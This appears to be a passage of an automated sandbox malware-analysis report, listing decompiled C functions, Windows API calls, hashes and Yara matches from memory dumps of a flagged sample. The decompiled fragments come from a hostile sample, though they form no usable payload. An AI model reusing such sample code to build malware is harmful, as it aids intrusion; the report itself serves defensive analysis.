                        					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                        					return 1;
                        				} else {
                        					return _t24;
                        				}
                        			}



















                        0x00409abb
                        0x00409ac3
                        0x00409ac5
                        0x00409aca
                        0x00409acf
                        0x00409ae2
                        0x00409ae7
                        0x00409af0
                        0x00409afc
                        0x00409b0f
                        0x00409b14
                        0x00409b17
                        0x00409b20
                        0x00409b32
                        0x00409b37
                        0x00409b3c
                        0x00000000
                        0x00000000
                        0x00409b3e
                        0x00409b42
                        0x00000000
                        0x00000000
                        0x00409b44
                        0x00000000
                        0x00409b42
                        0x00409b46
                        0x00409b49
                        0x00409b4f
                        0x00409b51
                        0x00409b5c
                        0x00409b61
                        0x00409b64
                        0x00409b71
                        0x00409b7c
                        0x00409b7e
                        0x00409b84
                        0x00409b88
                        0x00409b8b
                        0x00409b8b
                        0x00409b92
                        0x00409b95
                        0x00409b9a
                        0x00409ba7
                        0x00409ad6
                        0x00409ad6
                        0x00409ad6

                        Memory Dump Source
                        • Source File: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                        • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                        • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                        • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: AllocateHeap
                        • String ID: 6EA
                        • API String ID: 1279760036-1400015478
                        • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                        • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                        • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                        • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 27%
                        			E0041A5F7(void* __eax, void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, char _a12, long _a16, long _a20) {
                        				void* _t19;
                        				void* _t33;
                        				void* _t34;
                        				intOrPtr* _t36;
                        				void* _t38;
                        
                        				if(__ecx >  *__edx) {
                        					 *((intOrPtr*)(__ecx - 0x73)) =  *((intOrPtr*)(__ecx - 0x73)) + __edx;
                        					 *((intOrPtr*)(_t34 + 0x50)) =  *((intOrPtr*)(_t34 + 0x50)) + __edx;
                        					E0041AF60(_t33);
                        					_t12 =  &_a12; // 0x414536
                        					_t19 = RtlAllocateHeap( *_t12, _a16, _a20); // executed
                        					return _t19;
                        				} else {
                        					_t21 = _a4;
                        					_t3 = _t21 + 0xc6c; // 0xc6e
                        					_t36 = _t3;
                        					E0041AF60(_t33, _a4, _t36,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x33);
                        					return  *((intOrPtr*)( *_t36))(_a8, _a12, _t34, _t38);
                        				}
                        			}








                        0x0041a5f9
                        0x0041a63d
                        0x0041a644
                        0x0041a647
                        0x0041a652
                        0x0041a65d
                        0x0041a661
                        0x0041a5fb
                        0x0041a603
                        0x0041a60f
                        0x0041a60f
                        0x0041a617
                        0x0041a62d
                        0x0041a62d

                        APIs
                        • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: AllocateHeap
                        • String ID: 6EA
                        • API String ID: 1279760036-1400015478
                        • Opcode ID: d7731d8716a9909aaebbcc61393e2c5dcb5147951310e5446d50a0b4bd4e0840
                        • Instruction ID: f8b0307e263f0a20d44079788cd30cb9ea9ec63190e6cfd16d2e7c5213453682
                        • Opcode Fuzzy Hash: d7731d8716a9909aaebbcc61393e2c5dcb5147951310e5446d50a0b4bd4e0840
                        • Instruction Fuzzy Hash: 63E026F51082C45FD710DF34A8804C77BA4AE85308768818DF88803603C120C81286A1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 82%
                        			E00408310(void* __eflags, intOrPtr _a4, long _a8) {
                        				char _v67;
                        				char _v68;
                        				void* _t12;
                        				intOrPtr* _t13;
                        				int _t14;
                        				long _t21;
                        				intOrPtr* _t25;
                        				void* _t26;
                        				void* _t30;
                        
                        				_t30 = __eflags;
                        				_v68 = 0;
                        				E0041BE60( &_v67, 0, 0x3f);
                        				E0041CA00( &_v68, 3);
                        				_t12 = E0040ACF0(_t30, _a4 + 0x1c,  &_v68); // executed
                        				_t13 = E00414E50(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                        				_t25 = _t13;
                        				if(_t25 != 0) {
                        					_t21 = _a8;
                        					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                        					_t32 = _t14;
                        					if(_t14 == 0) {
                        						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A480(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                        					}
                        					return _t14;
                        				}
                        				return _t13;
                        			}












                        0x00408310
                        0x0040831f
                        0x00408323
                        0x0040832e
                        0x0040833e
                        0x0040834e
                        0x00408353
                        0x0040835a
                        0x0040835d
                        0x0040836a
                        0x0040836c
                        0x0040836e
                        0x0040838b
                        0x0040838b
                        0x00000000
                        0x0040838d
                        0x00408392

                        APIs
                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                        Memory Dump Source
                        • Source File: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: MessagePostThread
                        • String ID:
                        • API String ID: 1836367815-0
                        • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                        • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                        • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                        • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 58%
                        			E0040ACE5(void* __eax, void* __ebx, void* __ecx, void* _a8) {
                        				void* _v4;
                        				void* _v8;
                        				void* _v12;
                        				void* _v536;
                        				void* _t15;
                        
                        				_t15 = __eax;
                        				asm("stc");
                        				if (__ebx + 1 <= 0) goto L7;
                        			}








                        0x0040ace5
                        0x0040acee
                        0x0040acef

                        APIs
                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                        Memory Dump Source
                        • Source File: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: Load
                        • String ID:
                        • API String ID: 2234796835-0
                        • Opcode ID: ac607fe8fadfd29998aeae0fc689f596357b97b0bf363d8ae678b1bbacd093b8
                        • Instruction ID: 2939d7c89a7172a658210ab68ef3fead8153cd52e8a31b6efd872631f279e96f
                        • Opcode Fuzzy Hash: ac607fe8fadfd29998aeae0fc689f596357b97b0bf363d8ae678b1bbacd093b8
                        • Instruction Fuzzy Hash: 24F06875E4020DABDF10DB95DC82FD9B378AF48308F0081A6E91D9B681F630DA59CB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 64%
                        			E0041A7C2(signed int __eax, void* __ebx, void* __ecx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                        				int _t13;
                        				void* _t21;
                        
                        				asm("les esi, [edx]");
                        				asm("lds esi, [0x769869b8]");
                        				 *(__ecx + 0x55197a7f) =  *(__ecx + 0x55197a7f) | __eax;
                        				_t10 = _a4;
                        				E0041AF60(_t21, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t10 + 0xa18)), 0, 0x46);
                        				_t13 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                        				return _t13;
                        			}





                        0x0041a7c2
                        0x0041a7c5
                        0x0041a7cb
                        0x0041a7d3
                        0x0041a7ea
                        0x0041a800
                        0x0041a804

                        APIs
                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                        Memory Dump Source
                        • Source File: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: LookupPrivilegeValue
                        • String ID:
                        • API String ID: 3899507212-0
                        • Opcode ID: 5293b461ac1da1569b82276833f07d95cefbcf7da94b6f4b372471dededb407f
                        • Instruction ID: 691f3f98cb7d57195190baae01592f46005a8642ef15458af35efcd506b53531
                        • Opcode Fuzzy Hash: 5293b461ac1da1569b82276833f07d95cefbcf7da94b6f4b372471dededb407f
                        • Instruction Fuzzy Hash: 64F0A0B2600218ABDB14DF44CC40ED73768EF49310F258154FD086B242C631ED16CBE1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0041A670(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                        				char _t10;
                        				void* _t15;
                        
                        				_t3 = _a4 + 0xc74; // 0xc74
                        				E0041AF60(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                        				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                        				return _t10;
                        			}





                        0x0041a67f
                        0x0041a687
                        0x0041a69d
                        0x0041a6a1

                        APIs
                        • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                        Memory Dump Source
                        • Source File: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: FreeHeap
                        • String ID:
                        • API String ID: 3298025750-0
                        • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                        • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                        • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                        • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0041A7D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                        				int _t10;
                        				void* _t15;
                        
                        				E0041AF60(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                        				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                        				return _t10;
                        			}





                        0x0041a7ea
                        0x0041a800
                        0x0041a804

                        APIs
                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                        Memory Dump Source
                        • Source File: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: LookupPrivilegeValue
                        • String ID:
                        • API String ID: 3899507212-0
                        • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                        • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                        • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                        • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0041A6B0(intOrPtr _a4, int _a8) {
                        				void* _t10;
                        
                        				_t5 = _a4;
                        				E0041AF60(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                        				ExitProcess(_a8);
                        			}




                        0x0041a6b3
                        0x0041a6ca
                        0x0041a6d8

                        APIs
                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                        Memory Dump Source
                        • Source File: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID:
                        • API String ID: 621844428-0
                        • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                        • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                        • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                        • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Us$: $er-A$gent$urlmon.dll
                        • API String ID: 0-1367105278
                        • Opcode ID: 56c181f12cb253143a3ebd4a4736513a387cdaa9c04ea9ea34a49daaa3738e97
                        • Instruction ID: 6b5c8f8e5162a82d991e87feaa6df840a112a0b3d012ca3dfbf08a0c715c10e8
                        • Opcode Fuzzy Hash: 56c181f12cb253143a3ebd4a4736513a387cdaa9c04ea9ea34a49daaa3738e97
                        • Instruction Fuzzy Hash: 7911A2B2E01219ABDB00DF95DC42BFEFBB8EB55754F10005AEC04B7240E6799A4187EA
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: P
                        • API String ID: 0-3110715001
                        • Opcode ID: d831ea4a35eb71bb199559fc4c75f5bb8a55070e91059d5eac059b7f11c9ac45
                        • Instruction ID: 2212069e147ae62ab31d095ca9c7044be53877cbc0282b0d5f4af43051700b14
                        • Opcode Fuzzy Hash: d831ea4a35eb71bb199559fc4c75f5bb8a55070e91059d5eac059b7f11c9ac45
                        • Instruction Fuzzy Hash: 9ED0A736B8522189C7159E24B880175F364DAD3521B5817ADC96897082C2038016C796
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Executed Functions

                        APIs
                        • NtCreateFile.NTDLL(00000060,00000000,.z`,00164BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00164BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0016A3AD
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: CreateFile
                        • String ID: .z`
                        • API String ID: 823142352-1441809116
                        • Opcode ID: d56f46eb1be5e4239b1e6c94dcce05e592ab85c52cadf44414a321a4209374a5
                        • Instruction ID: e201317fee3b2f4e9fb01b108afa5c55c013cb6e56b8afee43b33731d69f6e18
                        • Opcode Fuzzy Hash: d56f46eb1be5e4239b1e6c94dcce05e592ab85c52cadf44414a321a4209374a5
                        • Instruction Fuzzy Hash: 3411F6B2210109AFCB08DF98DC84CEB77ADFF8C354B158649FA1DA3201D634E811CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • NtCreateFile.NTDLL(00000060,00000000,.z`,00164BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00164BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0016A3AD
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: CreateFile
                        • String ID: .z`
                        • API String ID: 823142352-1441809116
                        • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                        • Instruction ID: b935e230ec467c5d800e0e4f69292cf00cfbd60df5963ab52293de2e886c3d04
                        • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                        • Instruction Fuzzy Hash: FBF0B2B2200208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630E8118BA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • NtReadFile.NTDLL(00164D72,5EB65239,FFFFFFFF,00164A31,?,?,00164D72,?,00164A31,FFFFFFFF,5EB65239,00164D72,?,00000000), ref: 0016A455
                        Memory Dump Source
                        • Source File: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: FileRead
                        • String ID:
                        • API String ID: 2738559852-0
                        • Opcode ID: 1adc704855daf59fd18c7978f78fde3c6a462d23d04938e041fefc5bd728430c
                        • Instruction ID: 51ec181256a4d31c16deea36197936a05d9d79fb14302cb3688c39f0540f7f77
                        • Opcode Fuzzy Hash: 1adc704855daf59fd18c7978f78fde3c6a462d23d04938e041fefc5bd728430c
                        • Instruction Fuzzy Hash: 4AF07FB6200118AFCB14DF99DC81EEB77A9AF8C754F158248BA1DA7241DA30E911CBE1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • NtReadFile.NTDLL(00164D72,5EB65239,FFFFFFFF,00164A31,?,?,00164D72,?,00164A31,FFFFFFFF,5EB65239,00164D72,?,00000000), ref: 0016A455
                        Memory Dump Source
                        • Source File: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: FileRead
                        • String ID:
                        • API String ID: 2738559852-0
                        • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                        • Instruction ID: 111c4e409983554e4b3846d2844305b1335311aaf1d1747e717f2eec23aca8fd
                        • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                        • Instruction Fuzzy Hash: 09F0B7B2200208AFCB14DF99DC81EEB77ADEF8C754F158248BE1DA7241D630E811CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • NtClose.NTDLL(00164D50,?,?,00164D50,00000000,FFFFFFFF), ref: 0016A4B5
                        Memory Dump Source
                        • Source File: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: Close
                        • String ID:
                        • API String ID: 3535843008-0
                        • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                        • Instruction ID: cb14f74ee77c9a19b6c75f6bad18bb2cc5453176162c3bec0112fc28c5956eb4
                        • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                        • Instruction Fuzzy Hash: 4AD012752002146BD710EB98CC45E97775CEF44750F154495BA185B242C570F51086E1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • NtClose.NTDLL(00164D50,?,?,00164D50,00000000,FFFFFFFF), ref: 0016A4B5
                        Memory Dump Source
                        • Source File: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: Close
                        • String ID:
                        • API String ID: 3535843008-0
                        • Opcode ID: c44058b855ac9d5382c1e7bb39213284127d91912d72c7fd6612ddceb40b3234
                        • Instruction ID: 998ac8d127d4e475670f0e573fb7f02395d546ac60451caed09ef5f4c2c0d274
                        • Opcode Fuzzy Hash: c44058b855ac9d5382c1e7bb39213284127d91912d72c7fd6612ddceb40b3234
                        • Instruction Fuzzy Hash: 54D02BA950D2C08BDB10FBB4E8D40CABB60EF9061872469DEE4A407647D27192159391
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: dd33a8b4a897d4ae5f362abec55d42ec08b49ecb23d4f500ba8176077834500a
                        • Instruction ID: 6f54ecaafe4aab5b9ac8bdc7e55a51d10fbd1e75e4947aa49557ca00c8e2b21c
                        • Opcode Fuzzy Hash: dd33a8b4a897d4ae5f362abec55d42ec08b49ecb23d4f500ba8176077834500a
                        • Instruction Fuzzy Hash: 8690026221180142D60065694C14B17000997D0383F51C159A4154564CCA95C8716561
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: ff55cfd6f99b8af6b04bc10ace930afead03bdf56e6511a43234756e74ed680c
                        • Instruction ID: 609d0640243198f062bc373f2f1a9d43a127c6b23aebfb973fe9471070f76acf
                        • Opcode Fuzzy Hash: ff55cfd6f99b8af6b04bc10ace930afead03bdf56e6511a43234756e74ed680c
                        • Instruction Fuzzy Hash: 5990027220100513D51161594504717000D97D02C1F91C456A4424568D97D6C962B161
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: a664cbf0107d6e1ccecf8f0f6b6442587e6754afe959db17e3699d5acc36803d
                        • Instruction ID: 47d9df53b2a5edb3a6e527358ed0d4177c122747188373685f33c27ddaecf3af
                        • Opcode Fuzzy Hash: a664cbf0107d6e1ccecf8f0f6b6442587e6754afe959db17e3699d5acc36803d
                        • Instruction Fuzzy Hash: 8C900262242042525945B1594404517400AA7E02C1791C056A5414960C86A6D866E661
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 42b3981fa0978ae34620308abec44a8fafa2fb58dcab360553a4382244d41478
                        • Instruction ID: 79124577be17c51cbb11f68b50cf69b4bdcb5860cd8886906e0fd0c6c99c2812
                        • Opcode Fuzzy Hash: 42b3981fa0978ae34620308abec44a8fafa2fb58dcab360553a4382244d41478
                        • Instruction Fuzzy Hash: 079002A234100542D50061594414B170009D7E1381F51C059E5064564D8799CC627166
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 7a46c94efb0b28487c1d45d950a4316ec64d0777e065da97e1b238850729ceb4
                        • Instruction ID: 7d683bcf9a29332fac8bbfb834ed8a6b9a8c5249d5a47ae2238acc7059990484
                        • Opcode Fuzzy Hash: 7a46c94efb0b28487c1d45d950a4316ec64d0777e065da97e1b238850729ceb4
                        • Instruction Fuzzy Hash: E89002B220100502D54071594404757000997D0381F51C055A9064564E87D9CDE576A5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 2a78ff4ded87f43c42a53f1f83135b4afba8a78feeb846fa1ec39760c1eee838
                        • Instruction ID: 570f70ed9a36b5885b6f96cea80a89a3386ef7bb1f8dff0b51abebd2822e52bd
                        • Opcode Fuzzy Hash: 2a78ff4ded87f43c42a53f1f83135b4afba8a78feeb846fa1ec39760c1eee838
                        • Instruction Fuzzy Hash: CF90027220108902D5106159840475B000997D0381F55C455A8424668D87D5C8A17161
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: e18f8f2057de6c4eb72bc5a7d28fa5fd06106113797b0622e6639bcf5f0c3c3e
                        • Instruction ID: 09c5eb5dbbc07d873c6e2154fcd0830b534f6912fb0d83f630e6ae29d025caa6
                        • Opcode Fuzzy Hash: e18f8f2057de6c4eb72bc5a7d28fa5fd06106113797b0622e6639bcf5f0c3c3e
                        • Instruction Fuzzy Hash: 4B90027220100942D50061594404B57000997E0381F51C05AA4124664D8795C8617561
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: cb8f1f9405e4eabbc39cfaea2265754158a4ad1e7b0923c9486e846bb01152b6
                        • Instruction ID: feb9379bd1502c4ae0775f3d524498412577a626b030a3b3f334815fe4455b42
                        • Opcode Fuzzy Hash: cb8f1f9405e4eabbc39cfaea2265754158a4ad1e7b0923c9486e846bb01152b6
                        • Instruction Fuzzy Hash: DD90026A21300102D5807159540861B000997D1282F91D459A4015568CCA95C8796361
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: bf8e92a40bc5d4d1228aafc9a5828880fb5a2356c6c350da530f40a54263c9d8
                        • Instruction ID: cf136fa532eba20bfe41145c3fb9c5fdd1ef0e8d1b4f174f12faeea868e24623
                        • Opcode Fuzzy Hash: bf8e92a40bc5d4d1228aafc9a5828880fb5a2356c6c350da530f40a54263c9d8
                        • Instruction Fuzzy Hash: 5490027231114502D51061598404717000997D1281F51C455A4824568D87D5C8A17162
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
